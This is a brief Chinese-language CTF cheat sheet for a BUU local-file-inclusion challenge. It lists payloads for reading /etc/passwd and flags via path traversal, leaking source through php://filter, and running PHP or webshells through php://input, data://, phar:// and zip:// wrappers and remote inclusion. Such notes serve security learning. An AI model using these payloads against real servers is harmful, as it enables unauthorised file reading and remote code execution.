BUU-LFI-COUSE 1 /?file=/flag(/?file=file://flag)
任意文件读取
1.若为linux可以查看/etc/passwd ../../../
2.写不存在的目录名字进行穿越绕过etc/balabala/../passwd
3.file协议 /?file=file://
4.php协议 php://filter/read=convert.base64-encode/瞎写的/resource=index.php可以看到源码
5.远程代码生成webshell
6.php://input 可以把php代码中post发送请求
7.data://text/plain;base64,(php编码base64之后的值)
8.phar://本质为压缩包,可执行服务器里面的压缩包(phar://shell_dir.zip/shell_dir.php)查目录
9.zip://(zip://shell_dir.zip#shell_dir.php)